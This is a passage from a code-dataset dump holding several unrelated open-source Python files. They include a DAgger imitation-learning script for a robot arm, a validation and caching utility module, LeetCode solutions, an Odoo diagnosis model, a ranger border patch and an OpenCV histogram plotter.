zero\n if iterations < 10:\n gif_interval = 1\n else:\n gif_interval = int(iterations / 20)\n\n # Create log dir\n gif_dir = \"gifs/DAgger\"\n os.makedirs(gif_dir, exist_ok=True)\n\n # Create an agent in the environment\n model = algorithm(policy,\n env,\n verbose=1,\n tensorboard_log=\"log/\"\n )\n\n # Generate the first expert Dataset\n env.onscreen_title(\"First Trajectory\", text_size=5)\n dataset = env.generate_expert_traj(num_episodes=1, episode_timesteps=5000)\n\n dataset_info = {\n \"num_traj\":[],\n \"num_transition\":[],\n \"avg_ret\":[],\n \"std_ret\":[]\n }\n\n print()\n for i in range(iterations):\n print(\"--- Iteration {} Performance ---\".format(i))\n t_it_start = time.time()\n\n # Load the expert trajectories created by PID\n exp_dataset = ExpertDataset(\n traj_data=dataset,\n randomize=True,\n batch_size=batch_size,\n verbose=0)\n\n # Behavior Cloning on the dataset\n t_pretrain_start = time.time()\n model.pretrain(exp_dataset, n_epochs=epochs_per_dataset)\n t_pretrain_end = time.time()\n print(\"Pretraining Time {:.0f} s\".format(t_pretrain_end-t_pretrain_start))\n\n\n # Dict for storing episode data as generated by expert\n buffer = {\n \"actions\": 
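`save_gif` above renders the simulation at 240 Hz but writes the GIF at a lower `fps`, so it keeps only every `int(240 / fps)`-th frame and playback stays close to real time. The arithmetic, spelled out:

```python
sim_hz, fps = 240, 30                 # simulator rate vs. GIF playback rate
keep_every = int(sim_hz / fps)        # 8: keep one frame out of every eight
kept = [i for i in range(sim_hz) if i % keep_every == 0]
print(len(kept))                      # 30 frames per simulated second
```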
np.array([]),\n \"episode_returns\": np.array([]),\n \"rewards\": np.array([]),\n \"obs\": np.array([]),\n \"episode_starts\": np.array([])\n }\n\n # TODO Parallelize with VecEnv\n t_test_start = time.time()\n for n in range(episodes_per_it):\n # Run agent and record its trajectory\n env.onscreen_title(\"Test {}\".format(i))\n traj = test_agent(model)\n\n # Get expert dataset from that trajectory\n # Run agent and record its trajectory\n env.onscreen_title(\"Anotate Test {}\".format(i), text_size=5)\n new_trajectory = env.generate_expert_from_traj(traj)\n\n # Add that episode to the a buffer\n if n == 0:\n for key in buffer.keys():\n buffer[key] = new_trajectory[key]\n else:\n for key in buffer.keys():\n buffer[key] = np.concatenate((buffer[key],\n new_trajectory[key]))\n t_test_end = time.time()\n\n # Add to the pretraining Dataset\n for key in dataset.keys():\n dataset[key] = np.concatenate((dataset[key],buffer[key]))\n\n # Save iteration performance data\n returns = buffer[\"episode_returns\"]\n avg_ret = sum(returns) / len(returns)\n std_ret = np.std(np.array(returns))\n dataset_info[\"avg_ret\"].append(avg_ret)\n dataset_info[\"std_ret\"].append(std_ret)\n\n print(\"Episode Returns -> avg_ret: {:.0f} std_ret {:.0f}\".format(avg_ret,std_ret))\n print(\"Testing Time {:.0f} s\".format(t_test_end-t_test_start))\n tb_log.log_scalar('avg_ret', avg_ret, i)\n\n if gif_interval != 0 and (i % gif_interval) == 0:\n t_gif_start = time.time()\n save_gif(model, time=5, filename=\"gifs/DAgger/DAgger_iteration_{}.gif\".format(i))\n t_gif_end = time.time()\n print(\"Gif saving {:.0f} s\".format(t_gif_end-t_gif_start))\n\n t_it_end = time.time()\n print(\"Total Time {:.0f} s\".format(t_it_end-t_it_start))\n print()\n\n with open('training_data/DAgger/dagger_training_data_{}_iterations.pkl'.format(iterations),'wb') as f:\n pickle.dump(dataset_info, f)\n\n np.savez(\"PID_expert_path.npz\", **dataset)\n return model\n\ndef make_env(env_type):\n def _init():\n return env_type\n return _init\n\ndef parse_args():\n my_parser = argparse.ArgumentParser(\n description='Imitation learning of position control using th DAgger Algorithm')\n\n my_parser.add_argument('--test',\n help='Test the last trained model',\n action=\"store_true\")\n\n my_parser.add_argument('--iterations', '-i',\n type=int,\n help='Iterartions of the DAgger algorithm',\n default=15)\n\n my_parser.add_argument('--rl_timesteps', '-r',\n type=int,\n help='Run a DeepRL algorithm after dagger for RL_TIMESTEPS timesteps',\n default=0)\n\n my_parser.add_argument('--gif_interval', '-g',\n type=int,\n help='Interval at wich to save a gif of the trained agent',\n default=0)\n\n my_parser.add_argument('--gui',\n help='Show a window view of the robot during the program (slows down traning)',\n action=\"store_true\")\n\n # Execute parse_args()\n args = my_parser.parse_args()\n\n return args\n\nif __name__ == '__main__':\n\n args = parse_args()\n\n # DAgger parameters\n test = args.test\n dagger_iterations = args.iterations\n gif_interval = args.gif_interval\n\n # DeepRL after DAgger\n algorithm = A2C\n policy = CustomMLPPolicy\n rl_timesteps = args.rl_timesteps\n training_time = int(1e5)\n tensorboard_log=\"./{}_{}/\".format(algorithm.__name__, policy.__name__)\n\n # Create the environment\n env = PCEnv(gui=args.gui)\n\n if not test:\n # Clean up last run results\n delete_contents(\"gifs/\")\n delete_contents(\"log/\")\n delete_contents(\"models/\")\n\n # Learn with Imitation Learning using DAgger\n model = Dagger(env, algorithm, policy, 
dagger_iterations,\n epochs_per_dataset=100,\n gif_interval=gif_interval,\n batch_size=8*4096)\n\n model_dir = \"models/DAgger\"\n os.makedirs(model_dir, exist_ok=True)\n model_name=\"Dagger_{}_iterations\".format(dagger_iterations)\n model.save(os.path.join(model_dir+model_name))\n save_gif(model, filename=\"gifs/{}.gif\".format(model_name))\n\n # Optimize further with RL\n if rl_timesteps > 0:\n model.learn(rl_timesteps)\n model_name=\"DAgger_and_{}_{:.0f}e5_timesteps\".format(algorithm.__name__ ,\n rl_timesteps/10000)\n model.save(\"models/\"+model_name)\n save_gif(model, filename=\"gifs/{}.gif\".format(model_name))\n\n print(\"Training Done!\")\n\n else:\n env = DummyVecEnv([make_env(env)])\n model_name = \"Dagger_model\"\n model = algorithm.load(\"models/\"+model_name, env=env)\n t_gif_start = time.time()\n save_gif(model, filename=\"gifsave_test.gif\")\n t_gif_end = time.time()\n print(\"Gif creating time: {:.0f}s\".format(t_gif_end-t_gif_start))\n\n env.close()\n","repo_name":"imontesino/pybullet-iiwa","sub_path":"DAgger.py","file_name":"DAgger.py","file_ext":"py","file_size_in_byte":10984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"24973738856","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\"\"\"\n# SPDX-License-Identifier: LGPL-3.0\n\n__all__ = \"\"\"\ncached_property\ncoalesce\ndict_of\nget_class\nidentity\nlist_of\nset_of\nsmartmatch\ntupley\n\"\"\".split()\n\nimport importlib\nimport inspect\nimport re\nimport threading\nimport types\n\n_NOT_FOUND = object()\n\n\ndef identity(x):\n \"\"\"The identity function, returns its (single) argument\"\"\"\n return x\n\n\n# Dumb container for python 2 support in list_of() and dict_of()\nclass _Container(object):\n pass\n\ndef list_of(conv, container=list, package=None, frame=1):\n \"\"\"\n An :py:class:`amethyst.core.obj.Attr` helper function which will\n validate a list of values. Sample usage::\n\n class MyObject(Object):\n foo = Attr(list_of(float))\n\n obj = MyObject(foo=\"23\")\n print(obj.foo) # [ 23 ] - a list with an int\n\n obj.foo = (1, 2, \"23\")\n print(obj.foo) # [ 1, 2, 23 ] - a list not a tuple\n\n\n :param conv: The conversion function or class. If a class, objects in\n the list which are not already objects of this class will be inflated\n using the class. If passed a string, it will be converted to a class\n (or function) using the :py:func:`get_class` function.\n\n :param container: Constructor which can take a generator and return\n your desired list-like object. For instance, the :py:func:`set_of`\n function passes `container=set`.\n\n :param package: String or package object to use as the base for\n relative imports. When specified, is passed unmodified to\n :py:func:`get_class`.\n\n :param frame: Frame depth, as described in :py:func:`get_class`.\n\n \"\"\"\n c = _Container() # Closure variable for python 2 support (don't have \"nonlocal\")\n if frame and package is None and not callable(conv) and (conv.startswith('.') or '.' 
not in conv):\n package = inspect.getmodule(inspect.stack()[frame][0])\n\n def wrapper(thingun):\n # May not pre-compute these to allow list_of(\"Foo\") to be called\n # within the declaration of the Foo class.\n if not getattr(c, 'initialized', False):\n c.initialized = True\n c.conv = conv if callable(conv) else get_class(conv, package=package, frame=None)\n c.conv_is_type = isinstance(c.conv, type)\n return container(\n (x if c.conv_is_type and isinstance(x, c.conv) else c.conv(x))\n for x in tupley(thingun)\n )\n return wrapper\n\n\ndef set_of(conv, package=None, frame=1):\n \"\"\"\n Like :py:func:`list_of`, but uses a set container rather than a list\n container.\n \"\"\"\n return list_of(conv, container=set, frame=frame+1)\n\n\ndef dict_of(conv, key_conv=identity, set_key=None, package=None, frame=1):\n \"\"\"\n An :py:class:`amethyst.core.obj.Attr` helper function which will\n validate a dict of values and optionally keys. Sample usage::\n\n class MyObject(Object):\n name = Attr()\n foo = Attr(dict_of(\"MyObject\"))\n\n obj1 = MyObject(name=\"Alice\")\n obj2 = MyObject(foo={ \"a\": obj1, \"b\": dict(name=\"Bob\") })\n\n In the example, ``obj2.foo`` will be a dictionary with two items. Both\n values will be MyObject objects, the \"b\" item having been auto-inflated.\n\n .. WARNING::\n The produced attribute value is a normal python dict. Automatic\n inflation only occurs when initially setting the attribute. Normal\n accesses to the attribute dictionary will not validate or\n auto-inflate. For instance, ``obj2.foo[\"c\"] = dict(name=\"Carol\")``\n will store a python dict to key \"c\", not a MyObject.\n\n :param conv: The conversion function or class. If a class, values in\n the dict which are not already objects of this class will be inflated\n using the class. If passed a string, it will be converted to a class\n (or function) using the :py:func:`get_class` function.\n\n :param key_conv: Conversion function for keys, defaults to identity\n function.\n\n :param set_key: Optional callable passed key name and inflated value\n object. Can be used to set an attribute on the value objects based on\n keys. For instance, we might use ``set_key=lambda k, v: setattr(v,\n \"name\", v.name or k)`` to set default \"name\" attributes.\n\n :param package: String or package object to use as the base for\n relative imports. When specified, is passed unmodified to\n :py:func:`get_class`.\n\n :param frame: Frame depth, as described in :py:func:`get_class`.\n\n \"\"\"\n c = _Container() # Closure variable for python 2 support (don't have \"nonlocal\")\n if package is None and (\n (not callable(conv) and (conv.startswith('.') or '.' not in conv))\n or (not callable(key_conv) and (key_conv.startswith('.') or '.' 
not in key_conv))\n ):\n package = inspect.getmodule(inspect.stack()[frame][0])\n\n def wrapper(d):\n # May not pre-compute these to allow list_of(\"Foo\") to be called\n # within the declaration of the Foo class.\n if not getattr(c, 'initialized', False):\n c.initialized = True\n c.conv = conv if callable(conv) else get_class(conv, package=package, frame=None)\n c.conv_is_type = isinstance(c.conv, type)\n c.key_conv = key_conv if callable(key_conv) else get_class(key_conv, package=package, frame=None)\n c.key_conv_is_type = isinstance(c.key_conv, type)\n\n rv = dict()\n for k, v in d.items():\n key = k if c.key_conv_is_type and isinstance(k, c.key_conv) else c.key_conv(k)\n val = v if c.conv_is_type and isinstance(v, c.conv) else c.conv(v)\n if set_key:\n set_key(key, val)\n rv[key] = val\n return rv\n\n return wrapper\n\n\ndef get_class(name, package=None, frame=1):\n \"\"\"\n Load a class (or function or other package attribute) from a string\n name. Automatically imports required package. Requested name may be\n relative. If relative and no package is passed, the call stack is\n examined at the frame counter and imports are relative to that package.\n\n ::\n\n get_class(\"foo.Bar\") # Bar class from package foo\n get_class(\".Foo\") or get_class(\"Foo\") # Foo class from current package\n get_class(\".Foo\", frame=2) # Foo class from caller's package\n\n :param str name: A string containing a package name and class or object\n name joined by a dot. The package will be loaded and the attribute will\n be returned. From the name of the function, the intention if for\n automatic loading of classes. For example,\n `get_class(\"amethyst.core.Object\")`, however, python doesn't really\n distinguish between loading a class and loading a function or other\n package variable, so the object after the last dot can really be\n anything available in the package -- even unrelated imports to the\n package! For this reason, if classes or packages are imported for user\n or configuration input, it is a good idea to verify that the imported\n object matches some expected base class.\n\n :param package: String or package object to use as the base for\n relative imports.\n\n :param frame: Frame depth, for the default base package. When set to 1,\n relative class names are looked up relative to the caller's package.\n When set to a larger value, will look up relative to the caller's\n caller's ... package. Set to 0 or None (or set an explicit value for\n *package* to disable automatically selecting a base package.\n\n \"\"\"\n # Rewrite \"Foo\" as \".Foo\"\n if '.' not in name:\n name = '.' + name\n\n # Split out module and object name\n mod = name[0:name.rindex(\".\")]\n cls = name[len(mod)+1:]\n pkg = package if isinstance(package, types.ModuleType) else None\n # if name is \".Foo\" or \"..Foo\" we should not have stripped off a \".\"\n if mod in ('', '.'):\n mod = mod + '.'\n\n # Inspect stack and get calling package if relative name\n if frame and package is None and name.startswith('.') or '.' not in name:\n try:\n pkg = inspect.getmodule(inspect.stack()[frame][0])\n except Exception:\n pass\n\n # Special case for \".Foo\", we got the package directly\n if mod == '.' and pkg:\n pass\n else:\n if pkg and (package is None or isinstance(package, types.ModuleType)):\n package = pkg.__name__\n pkg = importlib.import_module(mod, package)\n return getattr(pkg, cls)\n\n\ndef tupley(thingun):\n \"\"\"\n Make sure thingun is like a tuple - a list, set, tuple. 
If not, wraps\n thingun into a single-item or empty (when None) tuple.\n \"\"\"\n if thingun is None:\n return ()\n if isinstance(thingun, (list, tuple, set, frozenset)):\n return thingun\n return (thingun,)\n\n\ndef coalesce(*args):\n \"\"\"\n Returns first argument which is not `None`. If no non-None argumenst,\n then will return `None`. Also returns `None` if argument list is empty.\n \"\"\"\n for x in args:\n if x is not None:\n return x\n return None\n\n\nRE_TYPE = type(re.compile(\"^$\"))\nNONE_TYPE = type(None)\ndef smartmatch(val, other):\n \"\"\"\n Smart match against a value\n\n Convenient function to use in attribute validation. Attempts to\n determine if a value is like other values. Behavior depends on type of\n the other object:\n\n * `list`, `tuple`, `set`, `frozenset`: Test membership and return the value\n unmodified.\n\n * `dict`: Look up the item and return the hashed value.\n\n * compiled `regex`: call ``other.search(val)``. Remember to anchor your\n search if that is desired!\n\n * `callable`: call ``other(val)`` and return the result\n\n * `type`, `NoneType`: Test ``val is other`` and, if true, return value\n\n * anything else: Test ``val == other`` and, if true, return value\n\n If none of the above match, raises a :py:exc:`ValueError`\n \"\"\"\n if isinstance(other, (list, tuple, set, frozenset)):\n if val in other:\n return val\n\n elif isinstance(other, dict):\n if val in other:\n return other[val]\n\n elif isinstance(other, RE_TYPE):\n if other.search(val):\n return val\n\n elif callable(other):\n return other(val)\n\n elif isinstance(other, (type, NONE_TYPE)):\n if val is other:\n return val\n\n elif val == other:\n return val\n\n raise ValueError(\"Invalid Value\")\n\n\nclass cached_property(object):\n \"\"\"\n Lazy Attribute Memoization\n\n .. NOTE:: functools in python 3.8 includes a cached_property decorator.\n It should be used in place of this for most cases.\n\n Creates properties with deferred calculation. Once calculated, the\n result is stored and returned from cache on subsequent access. Useful\n for expensive operations which may not be needed, or to ensure\n just-in-time construction (I like using this for database connections\n or building subwidgets in GUI classes, see examples below).\n\n Decorator Usage (most common)::\n\n class Foo(object):\n @cached_property\n def bar(self):\n print(\"Computing...\")\n return 42 # or expensive_calculation()\n\n foo = Foo()\n\n print(foo.bar) # Computing... 42\n print(foo.bar) # 42\n\n foo.bar = 12\n print(foo.bar) # 12\n\n del foo.bar # Clears the cache\n print(foo.bar) # Computing... 
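A usage sketch for `smartmatch` above (assuming it is imported from this module): behavior is dispatched on the type of the second argument, exactly as its docstring lists.

```python
import re

print(smartmatch(3, {1, 2, 3}))               # 3      (set membership)
print(smartmatch("b", {"b": "bee"}))          # 'bee'  (dict lookup)
print(smartmatch("x42", re.compile(r"\d+")))  # 'x42'  (unanchored regex search)
print(smartmatch("5", int))                   # 5      (callable: int("5"))
smartmatch(1, 2)                              # raises ValueError (1 != 2)
```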
42\n\n Direct use allows calculation to be closure or dynamically chosen.\n The bar attribute will behave the same as above::\n\n class Foo(object):\n def __init__(self, **kwargs):\n def expensive_calculation():\n ...\n\n self.bar = cached_property(expensive_calculation, \"bar\")\n\n\n Example: Automatic, thread-safe, database connections::\n\n import threading\n import sqlite3\n from amethyst.core import cached_property\n\n class MyObject(object):\n def __init__(self, **kwargs):\n self._thr_local = threading.local()\n\n @cached_property(delegate=\"_thr_local\")\n def db(self):\n conn = sqlite3.connect(\"mydb.sqlite3\")\n conn.execute(\"PRAGMA foreign_keys=ON\")\n return conn\n\n # obj.db will be a different connection in each thread\n # and will only connect if used in the thread\n\n\n Example: GUI widget building::\n\n import wx\n from amethyst.core import cached_property as widget\n\n class SimpleWindow(wx.Frame):\n def __init__(self, *args, **kwargs):\n super(SimpleWindow, self).__init__(*args, **kwargs)\n self.sizer.Add(self.button1)\n self.sizer.Add(self.button_exit)\n\n @widget\n def sizer(self):\n widget = wx.BoxSizer(wx.VERTICAL)\n self.SetSizer(widget)\n return widget\n\n @widget\n def button1(self):\n widget = wx.Button(self, wx.ID_ANY, \"Do Something\")\n widget.Bind(wx.EVT_BUTTON, self.on_click1)\n return widget\n\n @widget\n def button_exit(self):\n widget = wx.Button(self, wx.ID_ANY, \"Exit\")\n widget.Bind(wx.EVT_BUTTON, lambda evt: wx.Exit())\n return widget\n\n def on_click1(self, evt):\n print(\"Ouch!\")\n\n class MyApp(wx.App):\n def OnInit(self):\n self.mainwindow.Show(True)\n self.SetTopWindow(self.mainwindow)\n return True\n\n @widget\n def mainwindow(self):\n return SimpleWindow(None, -1, \"This is a test\")\n\n app = MyApp(0)\n app.MainLoop()\n \"\"\"\n def __init__(self, meth=None, name=None, delegate=None):\n \"\"\"\n :param meth: The method being decorated. Typically not passed to\n the constructor explicitly, see examples.\n\n :param name: Key name to use in object dict (or delegate attribute\n name). Automatically extracted from decorated method name if not\n specified.\n\n :param delegate: Attribute name containing an object to delegate\n storage to. If not `None`, the `name` attribute of `delegate`\n will be accessed (via `getattr`, `setattr`, and `delattr`) when\n determining whether to recompute the cached property and to\n store the computed property value (see example).\n\n .. 
NOTE:: If you aren't using the name or delegate options and can\n depend on python >= 3.8, the core functools package includes a\n cached_property decorator that should be used instead.\n \"\"\"\n self.name = name\n self.delegate = delegate\n self.lock = threading.RLock()\n\n # Simplify implementations by just coding different methods.\n # Python name mangling prevents setting self.__xxx__ directly.\n if delegate:\n self._get = self.get_delegate\n self._set = self.set_delegate\n self._del = self.del_delegate\n else:\n self._get = self.get_obj_dict\n self._set = self.set_obj_dict\n self._del = self.del_obj_dict\n if meth is not None:\n self(meth)\n\n def __call__(self, meth):\n self.meth = meth\n if self.name is None:\n self.name = meth.__name__\n return self\n\n def __get__(self, obj, typ=None):\n return self._get(obj, typ)\n def __set__(self, obj, value):\n self._set(obj, value)\n def __delete__(self, obj):\n self._del(obj)\n\n # object-dict storage\n def get_obj_dict(self, obj, typ=None):\n rv = obj.__dict__.get(self.name, _NOT_FOUND)\n if rv is _NOT_FOUND:\n with self.lock:\n rv = obj.__dict__.get(self.name, _NOT_FOUND) # no races\n if rv is _NOT_FOUND:\n obj.__dict__[self.name] = rv = self.meth(obj)\n return rv\n\n def set_obj_dict(self, obj, value):\n obj.__dict__[self.name] = value\n\n def del_obj_dict(self, obj):\n # Ignore exceptions to allow defensive clearing of the cache\n obj.__dict__.pop(self.name, None)\n\n # delegate storage\n def get_delegate(self, obj, typ=None):\n delegate = getattr(obj, self.delegate)\n rv = getattr(delegate, self.name, _NOT_FOUND)\n if rv is _NOT_FOUND:\n with self.lock:\n rv = getattr(delegate, self.name, _NOT_FOUND) # no races\n if rv is _NOT_FOUND:\n rv = self.meth(obj)\n setattr(delegate, self.name, rv)\n return rv\n\n def set_delegate(self, obj, value):\n setattr(getattr(obj, self.delegate), self.name, value)\n\n def del_delegate(self, obj):\n delattr(getattr(obj, self.delegate), self.name)\n","repo_name":"duelafn/python-amethyst-core","sub_path":"amethyst/core/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":16860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"4280026153","text":"class Solution(object):\n def maxJumps(self, arr, d):\n \"\"\"\n :type arr: List[int]\n :type d: int\n :rtype: int\n \"\"\"\n n = len(arr)\n dp = [1] * n\n for a, i in sorted([a, i] for i, a in enumerate(arr)):\n j = i - 1\n while j >= 0 and arr[j] < arr[i] and i - j <= d:\n dp[i] = max(dp[i], dp[j] + 1)\n j -= 1\n j = i + 1\n while j < n and arr[j] < arr[i] and j - i <= d:\n dp[i] = max(dp[i], dp[j] + 1)\n j += 1\n return max(dp)","repo_name":"LikunOuyang/Leetcode","sub_path":"Weekly Contest/5331_JumpGameV.py","file_name":"5331_JumpGameV.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29232404439","text":"class Solution:\n def PredictTheWinner(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n def range_sum(i, j):\n if i == 0: \n return pre_sum[j]\n else:\n return pre_sum[j] - pre_sum[i-1]\n\n n = len(nums)\n dp = [[0] * n for i in range(n)]\n \n pre_sum = [0] * n\n pre_sum[0] = nums[0]\n for i in range(1, n):\n pre_sum[i] = pre_sum[i-1] + nums[i]\n \n for i in range(n):\n dp[i][i] = nums[i]\n for j in range(1, n):\n for i in range(n):\n if i + j >= n: break\n dp[i][i+j] = max(nums[i] + range_sum(i+1, i+j) - dp[i+1][i+j], nums[i+j] + range_sum(i, i+j-1) - 
dp[i][i+j-1])\n \n if dp[0][-1] * 2 >= pre_sum[-1]:\n return True\n else:\n return False","repo_name":"YiqunPeng/Leetcode-pyq","sub_path":"solutions/486PredictTheWinner.py","file_name":"486PredictTheWinner.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5562551062","text":"import pygame\r\ndef button(board):\r\n color = (255,0,0)\r\n x = 310\r\n y = 780\r\n width = 150\r\n height = 50\r\n text = \"RESET\"\r\n pygame.draw.rect(board,(0,0,0), (x-2,y-2,width+4,height+4),5) \r\n pygame.draw.rect(board, color, (x,y,width,height),0)\r\n font = pygame.font.SysFont('comicsans',60)\r\n text = font.render(text,1,(0,0,0))\r\n board.blit(text,(x + (width/2 - text.get_width()/2), y + (height/2 - text.get_height()/2)))\r\n \r\n","repo_name":"lalith-krg/OXes","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"980184487","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, _\n# from mock import DEFAULT\nfrom datetime import datetime, timedelta\nfrom dateutil.relativedelta import relativedelta\nfrom odoo.exceptions import UserError, ValidationError\nimport hashlib\nimport time\nfrom odoo.exceptions import Warning\nimport json\n\n\nclass Diagnosis(models.Model):\n _name = 'diagnosis'\n _rec_name = 'code'\n \n code = fields.Char('Code', required=True)\n description = fields.Text('Description', required=True)\n\n @api.multi\n @api.depends('code', 'description')\n def name_get(self):\n result = []\n for rcd in self:\n name = rcd.code or ''\n if rcd.description:\n name += '/' + rcd.description\n result.append((rcd.id, name))\n return result\n\n @api.model\n def get_all_records(self):\n diagnosis_obj=self.env['diagnosis'].search_read([])\n return diagnosis_obj\n\n @api.multi\n def get_dignosis_description(self):\n return str(self.description)\n","repo_name":"Jeisonpernia/dental","sub_path":"pragtech_dental_management/models/diagnosis.py","file_name":"diagnosis.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21875794968","text":"from .requirements import get_requirement_handler\nfrom .effects import get_effect_handler\nfrom ...defcon.conditional import Conditional\n\nclass ConditionalFactory:\n\n def __init__(self, tree):\n\n self.conditional = Conditional()\n\n #print(\"Conditional tree: \" + tree.toStringTree())\n\n in_else = False\n\n for child in tree.getChildren():\n label = child.text\n\n if label == \"REQUIREMENTS\":\n self.add_requirements(child)\n elif label == \"EFFECTS\" and not in_else:\n self.add_effects(child)\n elif label == \"CONDITIONAL\":\n self.conditional.elseif_ = ConditionalFactory(child).get_conditional()\n elif label == \"else\":\n in_else = True\n elif label == \"EFFECTS\" and in_else:\n self.add_else_effects(child)\n\n def add_requirements(self, tree):\n '''Adds the requirements described by the given tree'''\n\n for r in tree.getChildren():\n if r.text == \"&\":\n continue\n req = get_requirement_handler(r)\n if req:\n self.conditional.requirements.append(req)\n\n def add_effects(self, tree):\n '''Adds the 'if' effects described by the given tree'''\n\n for e in tree.getChildren():\n effect = get_effect_handler(e)\n if effect:\n self.conditional.effects.append(effect)\n\n def add_else_effects(self, tree):\n 
'''Adds the 'else' effects described by the given tree'''\n\n for e in tree.getChildren():\n # Use an effects factory to get build the effect\n #effect = Effect_factory(e).get_effect()\n effect = get_effect_handler(e)\n if effect:\n self.conditional.else_effects.append(effect)\n\n def get_conditional(self):\n return self.conditional\n","repo_name":"AgentsUnited/daf","sub_path":"daf-core/modules/dgep/src/dgdl/factories/conditional_factory.py","file_name":"conditional_factory.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"70770058832","text":"\"\"\"\nPatch ranger.gui.widgets.view_miller.ViewMiller\n\n\"\"\"\n\nimport curses\nfrom ranger.gui.widgets.view_miller import ViewBase\nfrom ranger.gui.widgets.view_miller import ViewMiller\n\n\ndef enhance_draw_border(attr):\n \"\"\"\n Call by draw_border, fix ViewMiller can't draw border properly.\n\n :param attr int: attribute of curses\n \"\"\"\n\n _replace_resize()\n _wrap_draw_border(attr)\n\n\ndef _replace_resize():\n \"\"\"\n can replace resize by below code, but it's slow for startup.\n # code = textwrap.dedent(inspect.getsource(ViewMiller.resize))\n # code = code.replace('def resize', 'def view_miller_resize')\n # code = code.replace('left = pad', 'left = 0')\n # code = code.replace('wid = int(self.wid - left + 1 - pad)',\n # 'wid = int(self.wid - left + 1)')\n\n # wrapped_module = inspect.getmodule(ViewMiller)\n # exec(code, wrapped_module.__dict__) # pylint: disable=exec-used\n # ViewMiller.resize = wrapped_module.view_miller_resize\n \"\"\"\n\n def resize(self, y, x, hei=None, wid=None): # pylint: disable=invalid-name\n \"\"\"Resize all the columns according to the given ratio\"\"\"\n ViewBase.resize(self, y, x, hei, wid)\n\n border_type = self.settings.draw_borders.lower()\n if border_type in ['outline', 'both', 'true']:\n pad = 1\n else:\n pad = 0\n left = 0\n self.is_collapsed = self._collapse() # pylint: disable=protected-access\n if self.is_collapsed:\n generator = enumerate(self.stretch_ratios)\n else:\n generator = enumerate(self.ratios)\n\n last_i = len(self.ratios) - 1\n\n for i, ratio in generator:\n wid = int(ratio * self.wid)\n\n cut_off = self.is_collapsed and not self.settings.padding_right\n if i == last_i:\n if not cut_off:\n wid = int(self.wid - left + 1)\n else:\n self.columns[i].resize(pad, max(0, left - 1), hei - pad * 2, 1)\n self.columns[i].visible = False\n continue\n\n if i == last_i - 1:\n self.pager.resize(pad, left, hei - pad * 2, max(1, self.wid - left - pad))\n\n if cut_off:\n self.columns[i].resize(pad, left, hei - pad * 2, max(1, self.wid - left - pad))\n continue\n\n try:\n self.columns[i].resize(pad, left, hei - pad * 2, max(1, wid - 1))\n except KeyError:\n pass\n\n left += wid\n\n ViewMiller.resize = resize\n\n\ndef _wrap_draw_border(attr):\n def draw_border(self, border_types):\n self.win.attrset(attr)\n if 'outline' in border_types:\n try:\n self.win.hline(0, 0, curses.ACS_HLINE, self.wid)\n self.win.hline(self.hei - 1, 0, curses.ACS_HLINE, self.wid)\n y, x = self.win.getparyx() # pylint: disable=invalid-name\n self.parent.addch(y, 0, curses.ACS_LTEE)\n self.parent.addch(y, self.wid + 1, curses.ACS_RTEE)\n self.parent.addch(y + self.hei - 1, 0, curses.ACS_LTEE)\n self.parent.addch(y + self.hei - 1, self.wid + 1, curses.ACS_RTEE)\n except curses.error:\n pass\n\n if 'separators' in border_types:\n for child in self.columns[:-1]:\n if not child.has_preview():\n continue\n if child.main_column and 
self.pager.visible:\n                    break\n                y, x = self.hei - 1, child.x + child.wid - 1  # pylint: disable=invalid-name\n                try:\n                    self.win.vline(1, x, curses.ACS_VLINE, y - 1)\n                    if 'outline' in border_types:\n                        self.addch(0, x, curses.ACS_TTEE, 0)\n                        self.addch(y, x, curses.ACS_BTEE, 0)\n                    else:\n                        self.addch(0, x, curses.ACS_VLINE, 0)\n                        self.addch(y, x, curses.ACS_VLINE, 0)\n                except curses.error:\n                    pass\n\n    ViewMiller._draw_borders = draw_border  # pylint: disable=protected-access\n","repo_name":"kevinhwang91/rnvimr","sub_path":"ranger/plugins/patch/viewmiller.py","file_name":"viewmiller.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":730,"dataset":"github-code","pt":"83"}
+{"seq_id":"20777543367","text":"\"\"\"Histogram statistics for image data\"\"\"\n\nimport os\nimport cv2\nfrom matplotlib import pyplot as plt\n\n\ndef show_RGB_sum_distribution(filepath_image: str) -> None:\n    \"\"\"Plot the combined gray-level histogram over all three RGB channels\"\"\"\n    if os.path.isfile(filepath_image):\n        img = cv2.imread(filepath_image)\n        plt.hist(img.reshape([-1]), 256, [0, 256])\n        plt.show()\n    else:\n        raise ValueError(\"The given path '{}' is not a file\".format(filepath_image))\n\n\ndef show_RGB_each_distribution(filepath_image: str) -> None:\n    \"\"\"Plot the gray-level histogram of each RGB channel separately\"\"\"\n    if os.path.isfile(filepath_image):\n        img = cv2.imread(filepath_image)\n        color = (\"r\", \"g\", \"b\")\n        for i, col in enumerate(color):\n            histr = cv2.calcHist([img], [i], None, [256], [0, 256])\n            plt.plot(histr, color=col)\n            plt.xlim([0, 256])\n        plt.show()\n    else:\n        raise ValueError(\"The given path '{}' is not a file\".format(filepath_image))\n\n\nif __name__ == \"__main__\":\n    filepath_spongebob_img = (\n        \"./Chapter1_PythonBasic/Lab3_FigureStatistics/data/images/SpongeBob.png\"\n    )\n    show_RGB_sum_distribution(filepath_spongebob_img)\n    show_RGB_each_distribution(filepath_spongebob_img)\n    